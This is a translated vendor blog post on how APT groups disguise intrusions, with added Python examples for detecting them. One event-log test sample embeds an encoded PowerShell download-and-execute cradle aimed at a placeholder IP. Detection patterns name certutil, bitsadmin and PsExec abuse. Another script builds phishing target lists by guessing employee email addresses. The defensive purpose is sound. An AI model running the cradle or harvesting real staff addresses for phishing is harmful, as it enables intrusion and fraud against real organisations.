A wolf in sheep's clothing: how to catch a hacker who carefully disguises himself as an ordinary user



Image: Unsplash

As hacker activity grows, products and methods are appearing that can identify the actual techniques used for intrusion, persistence and propagation. Attackers therefore try to stay one step ahead and remain as inconspicuous as possible.

Today we will talk about the tactics cybercriminals use to hide the traces of their actions, and about how to spot them.


While investigating the activities of APT groups this year, we saw an increase in the number of APT attacks across industries. Last year 12 APT groups came into our view; this year 27 groups were the subject of research. This trend correlates with the steady quarter-over-quarter growth in the number of unique cyber incidents (according to our data, 6% more unique incidents were recorded in the third quarter of 2019 than in the second). These conclusions are confirmed by data from the General Prosecutor's Office: last year the number of IT crimes almost doubled compared with 2018 and by the end of the year reached 270,000 registered cases, i.e. 14% of all registered crimes in Russia. As expected, targeted attacks prevailed significantly over mass ones. Throughout 2019 we observed growth in targeted attacks: in the third quarter their share was 65% (against 59% in the second quarter and 47% in the first).

Behind a hacker attack there is almost always a financial motive. Most often, attackers steal money directly from company accounts. In other cases they steal confidential data and documents for extortion, or break into a company's infrastructure and sell access to it on the black market. Ordinary espionage, in which attackers are interested in information rather than money, should not be discounted either. The usual motive here is competition: hackers can steal trade secrets to order, disrupt a rival company's work, or drag it into a scandal. As part of our study we identified 10 APT groups that attacked state-owned companies in Russia over the past two years and noted that their main motive was espionage. We also surveyed IT and information security specialists on their companies' readiness to withstand APT attacks. Almost every second respondent from the public sector (45%) replied that their company is not ready for an APT, and 68% noted that their information security specialists are not qualified enough to counter such complex threats.

Our retrospective analysis and incident investigation projects show that many companies that have started detecting cyber incidents find traces of intrusions that occurred months or even years earlier (the TaskMasters group, identified last year, had been in the infrastructure of one of its victims for at least eight years). This means that criminals have long controlled many organizations, while the organizations themselves do not notice their presence and believe they are protected. Moreover, it often turns out that not one but several groups are "living" in the infrastructure of such companies.

According to our estimates, a toolkit for an attack aimed at stealing money from a bank can cost from 55 thousand US dollars. A cyber-espionage campaign is far more expensive: its minimum budget is 500 thousand US dollars.

It would seem that the market offers plenty of anti-hacking products. So how do intruders get into organizations' networks? That is the question we consider in today's article.

Social engineering


Social engineering is one of the most common ways into an infrastructure. Large companies employ many people, and their awareness of information security rules varies, so some employees are more susceptible to social engineering and phishing. Compiling a target list for a phishing mailing takes nothing more than a search of open sources (OSINT).

Many of us have social network accounts, and some of them reveal where we work. Most often a corporate email address is "first initial + last name in Latin letters" with slight variations. So it is enough for the hacker to know the company's address format and an employee's full name to guess the email address with 90% probability. Data can also be bought on underground forums or in the corresponding channels of popular messengers, or found in the next database leak.
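To make the address-guessing step concrete, here is an added example (not code from the original article or from Positive Technologies) that goes slightly beyond the single "initial + last name" pattern in the text: it infers which of several common address formats a company uses from one known address, then applies that format to a list of names collected from social networks. The format names, the sample names and the domain example.com are assumptions for illustration; names are assumed to be already transliterated into Latin letters, since Cyrillic input is simply dropped by the normalizer. The same routine is useful on the defensive side, to see which of your staff addresses are trivially derivable.

```python
"""Generate candidate corporate e-mail addresses from employee names.

Added example, not from the original article. Assumes the address
format has been learned from one leaked or published address, and that
names are already in Latin letters (Cyrillic is discarded by normalize()).
"""
import re
import unicodedata

# Address formats commonly seen in corporate mail. The keys are our own
# labels; the values are str.format() templates.
FORMATS = {
    "f.last": "{f}.{last}",          # i.petrov
    "flast": "{f}{last}",            # ipetrov
    "first.last": "{first}.{last}",  # ivan.petrov
    "first_last": "{first}_{last}",  # ivan_petrov
    "last.f": "{last}.{f}",          # petrov.i
    "lastf": "{last}{f}",            # petrovi
    "first": "{first}",              # ivan
}

def normalize(part):
    """Lower-case, strip accents, and drop anything that is not a-z or 0-9."""
    ascii_part = unicodedata.normalize("NFKD", part).encode("ascii", "ignore").decode()
    return re.sub(r"[^a-z0-9]", "", ascii_part.lower())

def candidates(full_name, domain, formats=None):
    """Return candidate addresses for one person (first and last word of the name)."""
    parts = [p for p in (normalize(x) for x in full_name.split()) if p]
    if len(parts) < 2:          # nothing usable (e.g. a Cyrillic-only name)
        return []
    first, last = parts[0], parts[-1]
    ctx = {"first": first, "last": last, "f": first[0]}
    out = []
    for name in (formats or list(FORMATS)):
        addr = f"{FORMATS[name].format(**ctx)}@{domain}"
        if addr not in out:
            out.append(addr)
    return out

def guess_format(known_address, known_name):
    """Infer which FORMATS entry produced a known address for a known name."""
    local = known_address.split("@")[0].lower()
    for fmt_name in FORMATS:
        cand = candidates(known_name, "x", [fmt_name])
        if cand and cand[0].split("@")[0] == local:
            return fmt_name
    return None

def build_target_list(names, domain, known=None):
    """Map each name to its candidates, narrowed to one format if it can be inferred."""
    fmt = guess_format(*known) if known else None
    return {n: candidates(n, domain, [fmt] if fmt else None) for n in names}

# Constructed sample data: not real people, not a real company.
SAMPLE_NAMES = ["Ivan Petrov", "Anna Sergeevna Kuznetsova", "Élodie Durand"]
KNOWN = ("ipetrov@example.com", "Ivan Petrov")

if __name__ == "__main__":
    for name, addrs in build_target_list(SAMPLE_NAMES, "example.com", KNOWN).items():
        print(name, "->", addrs)
```

With the known address the list collapses to one candidate per person; without it, every format is tried, which is exactly the noisier mailing a defender's mail gateway would see from a less prepared attacker.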

Vulnerabilities in internet-facing infrastructure


A large enterprise means not only a large number of people but also a large number of services: remote access services, databases, administration panels, websites. The more of them there are, the harder they are to control, so there are situations where a configuration error makes a service reachable from outside. If a hacker constantly monitors the organization's perimeter, they will notice such a "hole" quickly; how quickly depends only on how often they scan the perimeter, anywhere from a couple of minutes to a day.

In the worst case, the exposed service has a known vulnerability, which lets an attacker use an exploit immediately and get into the network. And if the default password was not changed when the service was configured, the hacker gets at the data several times faster simply by trying the default login and password combination.
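The defender's counterpart to the attacker's perimeter scanning is to scan the perimeter yourself on the same schedule and diff the result against an approved baseline. The following added example (not from the original article) does that over a simplified one-line-per-open-port format that mirrors a scanner's output; the sample scan lines are constructed (RFC 5737 documentation addresses), and the list of services that "must never be internet-facing" is an assumed policy, not a standard.

```python
"""Continuous perimeter check: diff today's scan against an approved baseline.

Added example, not from the original article. Input lines look like
'host port/proto service banner'; sample data is constructed.
"""
from collections import namedtuple

Service = namedtuple("Service", "host port proto name banner")

# Assumed policy: services that must not be reachable from the internet.
NEVER_EXPOSE = {"ms-wbt-server", "mysql", "postgresql", "mongodb", "redis",
                "microsoft-ds", "netbios-ssn", "vnc", "winrm", "elasticsearch"}

def parse_scan(text):
    """Parse 'host port/proto service banner...' lines into a set of Service tuples."""
    services = set()
    for line in text.strip().splitlines():
        fields = line.split(maxsplit=3)
        if len(fields) < 3:
            continue                      # malformed line, skip it
        host, portproto, name = fields[:3]
        banner = fields[3] if len(fields) == 4 else ""
        port, proto = portproto.split("/")
        services.add(Service(host, int(port), proto, name, banner))
    return services

def diff_perimeter(baseline, current):
    """Return (new_exposures, disappeared) keyed on host/port/proto, sorted."""
    key = lambda s: (s.host, s.port, s.proto)
    base_keys = {key(s) for s in baseline}
    cur_keys = {key(s) for s in current}
    new = sorted(s for s in current if key(s) not in base_keys)
    gone = sorted(s for s in baseline if key(s) not in cur_keys)
    return new, gone

def triage(new_exposures):
    """CRITICAL if the service is in NEVER_EXPOSE, otherwise REVIEW."""
    return [("CRITICAL" if s.name in NEVER_EXPOSE else "REVIEW", s)
            for s in new_exposures]

# Constructed sample scans. Today's scan shows a host that was not there
# yesterday, with RDP and a CI web interface reachable from outside.
BASELINE_SCAN = """
203.0.113.10 443/tcp https nginx
203.0.113.10 80/tcp http nginx
203.0.113.20 25/tcp smtp Postfix
"""
TODAY_SCAN = """
203.0.113.10 443/tcp https nginx
203.0.113.10 80/tcp http nginx
203.0.113.20 25/tcp smtp Postfix
203.0.113.30 3389/tcp ms-wbt-server Microsoft Terminal Services
203.0.113.30 8080/tcp http Jenkins
"""

if __name__ == "__main__":
    new, gone = diff_perimeter(parse_scan(BASELINE_SCAN), parse_scan(TODAY_SCAN))
    for level, s in triage(new):
        print(f"{level}: {s.host}:{s.port}/{s.proto} {s.name} {s.banner}")
    for s in gone:
        print(f"GONE: {s.host}:{s.port}/{s.proto} {s.name}")
```

The point of keying on host/port/protocol rather than on the banner is that a version bump is not a new exposure; a new port is, and it should be reviewed on the day it appears, before an attacker's scanner finds it.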

Why attacks are getting harder to spot




A turning point in the growing sophistication of hacker attacks was the appearance of the Stuxnet worm in 2010, which many call the first cyber weapon. For a long time it went unnoticed in the network of the Iranian nuclear program, where it manipulated the speed of uranium-enrichment centrifuges and disabled equipment. Over the years it was found in other computer networks as well. The use of zero-day vulnerabilities, digital signatures, and distribution via USB devices and shared printers allowed the worm to go undetected for a long time.

Hackers began to form groups. In the 2000s we mostly saw lone hackers; the 2010s saw the active growth of organized cybercrime, and the number of crimes began to increase rapidly. At the beginning of the decade, business owners did not think much about the information security of their organizations, which let hackers steal millions of dollars almost unhindered. In the first half of the decade, financial institutions were not ready for complex malware such as Carberp and Carbanak. Attacks using them caused approximately $1 billion in damage.

Today there are solutions for detecting intrusions and attacker activity inside the infrastructure. In response, hackers develop workarounds to stay undetected for as long as possible. For example, they use living-off-the-land techniques: commands are executed remotely on hosts through mechanisms built into the OS and trusted programs. In a Windows infrastructure these can be PowerShell, WMI and utilities from the Sysinternals suite. The PsExec utility, for instance, has proven itself among IT administrators and cybercriminals alike. For the defender this means the program itself is not the indicator; what matters is who ran it, from where, when, and with what arguments.
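Because the tools are legitimate, living-off-the-land activity is caught by looking at the details Windows already records: a PSEXESVC service being installed (System log event 7045) and process creations with telltale command lines (Security log event 4688, with command-line auditing enabled). The added example below (not code from the original article) runs a handful of such rules over constructed event records; the field names follow the Windows event XML, but the records themselves are made up, and the encoded PowerShell payload is a string built inside the example, not something that is executed.

```python
"""Flag living-off-the-land activity in Windows event log records.

Added example, not from the original article. Events are constructed
dicts carrying the fields of System 7045 (service installed) and
Security 4688 (process created, with command-line auditing).
"""
import base64
import re

# Command-line patterns that are normal for admins but worth a look when
# they come from an unexpected user, host or time of day.
SUSPICIOUS_CMDLINE = [
    (re.compile(r"powershell(\.exe)?\b.*\s-(e|ec|enc|encodedcommand)\s", re.I), "encoded PowerShell"),
    (re.compile(r"\bwmic(\.exe)?\b.*\bprocess\s+call\s+create\b", re.I), "WMI remote process creation"),
    (re.compile(r"\bpsexec(\.exe)?\b|\bpaexec", re.I), "PsExec-style remote execution"),
    (re.compile(r"\bbitsadmin(\.exe)?\b.*/transfer", re.I), "BITS download"),
    (re.compile(r"\bcertutil(\.exe)?\b.*-urlcache", re.I), "certutil download"),
]

def decode_encoded_powershell(cmdline):
    """Return the decoded -EncodedCommand payload (base64 of UTF-16LE) or None."""
    m = re.search(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", cmdline, re.I)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def check_event(ev):
    """Return a list of (reason, detail) findings for one event record."""
    findings = []
    if ev["EventID"] == 7045:                      # service installed
        name = ev.get("ServiceName", "")
        image = ev.get("ImagePath", "")
        if "PSEXESVC" in name.upper() or "PSEXESVC" in image.upper():
            findings.append(("PsExec service installed", f"{name} -> {image}"))
        elif re.search(r"\\ADMIN\$\\|%COMSPEC%|cmd\.exe\s*/c", image, re.I):
            findings.append(("service running a shell command", image))
    elif ev["EventID"] == 4688:                    # process created
        cmd = ev.get("CommandLine", "")
        for pattern, label in SUSPICIOUS_CMDLINE:
            if pattern.search(cmd):
                decoded = decode_encoded_powershell(cmd)
                detail = f"{cmd}  [decoded: {decoded}]" if decoded else cmd
                findings.append((label, detail))
    return findings

def scan_events(events):
    """Run check_event over records; return (record, findings) for hits only."""
    results = []
    for ev in events:
        hits = check_event(ev)
        if hits:
            results.append((ev, hits))
    return results

# Constructed sample log. ENC is a classic download-cradle string encoded
# the way "-EncodedCommand" expects; it is only data here.
ENC = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/a')".encode("utf-16-le")
).decode()
SAMPLE_EVENTS = [
    {"EventID": 7045, "Computer": "FS01", "ServiceName": "PSEXESVC",
     "ImagePath": r"%SystemRoot%\PSEXESVC.exe", "AccountName": "CORP\\jdoe"},
    {"EventID": 4688, "Computer": "WS17", "SubjectUserName": "jdoe",
     "NewProcessName": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": f"powershell.exe -nop -w hidden -enc {ENC}"},
    {"EventID": 4688, "Computer": "WS17", "SubjectUserName": "jdoe",
     "NewProcessName": r"C:\Windows\System32\notepad.exe",
     "CommandLine": "notepad.exe report.txt"},
]

if __name__ == "__main__":
    for ev, hits in scan_events(SAMPLE_EVENTS):
        for reason, detail in hits:
            print(f"[{ev['Computer']}] {reason}: {detail}")
```

None of these rules is a verdict on its own: an administrator's PsExec session on a jump host during a change window looks identical. The rules are there to produce a short list that is then joined with the account, the source host and the time, which is where the "ordinary user" of the title stops looking ordinary.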

Attackers also use the watering hole technique: they compromise an industry website or application that the company's employees often visit or use and plant malicious code in it. When the user launches the application or opens the site, malware is downloaded to their device, and through it the attacker enters the infrastructure. This method has been adopted by APT groups such as Turla and Winnti.

Some hacker groups, for example Cobalt, Silence and TaskMasters, use supply chain attacks. Attackers compromise in advance the servers of a partner of the target organization and then send phishing mailings from its mailboxes. Hackers do not limit themselves to sending letters: they attack the developers of software used by the organizations of interest and embed malicious code, for example, in the next update. All users who install that update infect their computers. This is how the malicious code of the NotPetya ransomware was built into just one update of an accounting program.

However, whatever advantages malware gives an attacker, an antivirus or sandbox can detect it if it arrives by mail. So attackers invent ever more sophisticated code obfuscation techniques (for example, virtualizing the code), carry out fileless attacks, and build anti-VM and anti-sandbox checks into the code.

Nor can it be ruled out that an attacker manages without malware at all inside the network, limiting themselves to tools permitted by security policies.

How to catch a hacker in infrastructure: best practices and major mistakes




The simplest way to keep an uninvited guest out of your infrastructure is to build the right line of defense. Three main components can be distinguished here:

  • reliable perimeter;
  • knowledgeable users;
  • role and password policies.

There is an excellent line in Sun Tzu's "The Art of War": "Advance where you are not expected, attack where they are unprepared." Ensuring cybersecurity must not be limited to the perimeter and traditional means of protection. As the results of our study showed, 92% of threats are identified when the adversary is already inside.

Cyber groups have learned to overcome the perimeter defenses of the organizations they target, as the growing share of successful targeted attacks shows. This is a reason to shift the focus from preventing attacks at the perimeter to timely detection of compromise and response inside the network.

If an incident does happen, you need to build the whole chain of events the hacker went through on the way to the goal: a timeline. When an incident is detected, many do not know how to react correctly, panic, and make mistakes at the earliest stages. A hectic clean-up begins that wipes out the incident's artifacts. Few think immediately about how it happened, and by the time the need to find the root cause becomes apparent, most of the traces have already been destroyed and the picture has to be reconstructed from what remains.

It also happens that the hacker is still online during the incident and the victim tries to "knock them out" by every available means without understanding which parts of the infrastructure and which services the attacker controls. In that case the hacker can leave by loudly slamming the door: for example, by encrypting the hosts under their control.

Finding an attacker in an infrastructure is not always a trivial task. With a competent approach, they can stay in the infrastructure for a long time. For example, the TaskMasters group, discovered by experts of PT Expert Security Center in 2018, hid its presence in some organizations for years. The hackers returned to the compromised infrastructure several times to exfiltrate another batch of data, then covered their tracks while leaving several access points into the internal network. And each time they went unnoticed. In such cases, hackers can be spotted by abnormal network activity (which mostly occurred at night): a large volume of traffic to external hosts, or non-standard lateral movement inside.
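The two signals named above, large off-hours transfers to external hosts and one internal host reaching unusually many internal peers on administrative ports, are easy to check over flow summaries (NetFlow/IPFIX style records). The following added example (not code from the original article or from any Positive Technologies product) does both over constructed flow records; the "night" window, the byte and fan-out thresholds, and the internal address ranges are assumed tuning values that would be set per organization.

```python
"""Off-hours egress and lateral fan-out over flow records.

Added example, not from the original article. Each flow is a constructed
(timestamp, src, dst, dst_port, bytes) tuple in the shape of a NetFlow/
IPFIX summary; thresholds and address ranges are assumed tuning values.
"""
from collections import defaultdict
from datetime import datetime
import ipaddress

INTERNAL_NETS = [ipaddress.ip_network("10.0.0.0/8"),
                 ipaddress.ip_network("192.168.0.0/16")]
ADMIN_PORTS = {445, 135, 3389, 5985, 5986, 22}   # SMB, RPC, RDP, WinRM, SSH
NIGHT_HOURS = range(0, 6)                       # assumed "nobody works" window
EGRESS_BYTES_THRESHOLD = 200 * 1024 * 1024      # assumed: 200 MB per host per night
FANOUT_THRESHOLD = 10                           # assumed: distinct admin-port peers

def is_internal(ip):
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in INTERNAL_NETS)

def night_egress(flows):
    """Bytes sent to external hosts during NIGHT_HOURS, per internal source,
    keeping only sources above EGRESS_BYTES_THRESHOLD."""
    totals = defaultdict(int)
    for ts, src, dst, _port, nbytes in flows:
        if is_internal(src) and not is_internal(dst) and ts.hour in NIGHT_HOURS:
            totals[src] += nbytes
    return {src: b for src, b in totals.items() if b >= EGRESS_BYTES_THRESHOLD}

def lateral_fanout(flows):
    """Distinct internal peers each internal host contacted on ADMIN_PORTS,
    keeping only hosts at or above FANOUT_THRESHOLD."""
    peers = defaultdict(set)
    for _ts, src, dst, port, _nbytes in flows:
        if is_internal(src) and is_internal(dst) and port in ADMIN_PORTS:
            peers[src].add(dst)
    return {src: len(p) for src, p in peers.items() if len(p) >= FANOUT_THRESHOLD}

def build_sample_flows():
    """Constructed flows: one workstation sweeps SMB across 12 peers at 02:30,
    then pushes 300 MB to an external host at 03:05; plus daytime noise."""
    flows = []
    sweep_time = datetime(2019, 11, 5, 2, 30)
    for i in range(12):
        flows.append((sweep_time, "10.0.5.23", f"10.0.7.{i + 1}", 445, 4096))
    flows.append((datetime(2019, 11, 5, 3, 5), "10.0.5.23", "198.51.100.9", 443,
                  300 * 1024 * 1024))
    flows.append((datetime(2019, 11, 5, 14, 0), "10.0.5.40", "198.51.100.50", 443,
                  5 * 1024 * 1024))
    flows.append((datetime(2019, 11, 5, 14, 10), "10.0.5.40", "10.0.9.1", 445, 8192))
    return flows

if __name__ == "__main__":
    flows = build_sample_flows()
    print("night egress (bytes):", night_egress(flows))
    print("lateral fan-out (peers):", lateral_fanout(flows))
```

Both checks flag the same host here, which is the pattern the TaskMasters description implies: the sweep finds the data, the night transfer moves it out. In production the thresholds should come from each host's own history rather than fixed constants, so that a backup server's nightly transfers do not drown the one workstation that should never be sending 300 MB out at 3 a.m.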

But what if we do not know whether there is a hacker inside the network and want to protect ourselves by verifying the absence of a compromise? For that you need a large knowledge base on how a hacker can act: how they penetrate, how they gain a foothold, how they move. Fortunately, such a knowledge base exists: ATT&CK, developed and maintained by the MITRE Corporation on the basis of analysis of real APT attacks. The base is a visual table of the tactics a hacker can resort to in order to achieve their goal. It structures knowledge about targeted attacks and categorizes attackers' actions. The database is constantly updated by researchers from all over the world, which lets information security experts in all countries speak the same language. Knowing the tactics also helps to identify traces of compromise and to prepare in advance: strengthen weak spots, put them under closer control, and respond quickly when an attacker appears.

Attackers also leave traces in network traffic, so the job of a cybersecurity specialist is to detect those traces. The results of our pilot projects have shown that NTA (network traffic analysis) solutions can effectively identify threats of varying degrees of risk, from violations of IS regulations to complex targeted attacks.

Technical details on how to catch a hacker in network traffic (a detailed manual with screenshots) can be found in our Anti-Malware article.

What to expect in the future: cybersecurity trends


News about data leaks has become especially loud in recent years, partly because attackers manage to reuse leaks from previous years. This gives them more complete digital dossiers on a huge number of users. We expect this trend to continue.

In 2019 we recorded more than 1,500 hacker attacks, 19% more than in 2018. In 81% of cyber attacks the victims were legal entities. By the end of the year, the five most frequently attacked sectors were government institutions, industry, healthcare, science and education, and the financial sector. The industry focus will continue.

The share of targeted attacks is growing: in each quarter we observed more targeted attacks than in the previous one. In the first quarter of 2019, fewer than half of attacks (47%) were targeted; by the end of the year their share was already 67%. Expect further growth in APT attacks.

To keep pace with new threats, protection technologies must also develop actively. However, a high level of protection cannot be achieved with countermeasures and attack detection tools alone. We recommend that companies regularly conduct penetration testing and train IS staff through red teaming: this detects and eliminates potential attack vectors to critical resources in good time and debugs the interaction of IS and IT teams in the event of a cyber attack.

Our company has developed an anti-APT network protection system designed to detect and prevent targeted attacks. It lets you quickly detect an attacker's presence on the network and recreate the full picture of the attack for detailed investigation. Detection of anomalous network activity, retrospective analysis of files and an advanced sandbox reduce incident response time or prevent the incident altogether.

Posted by Denis Kuvshinov, Leading Specialist, Positive Technologies Cyber ​​Threat Research Team
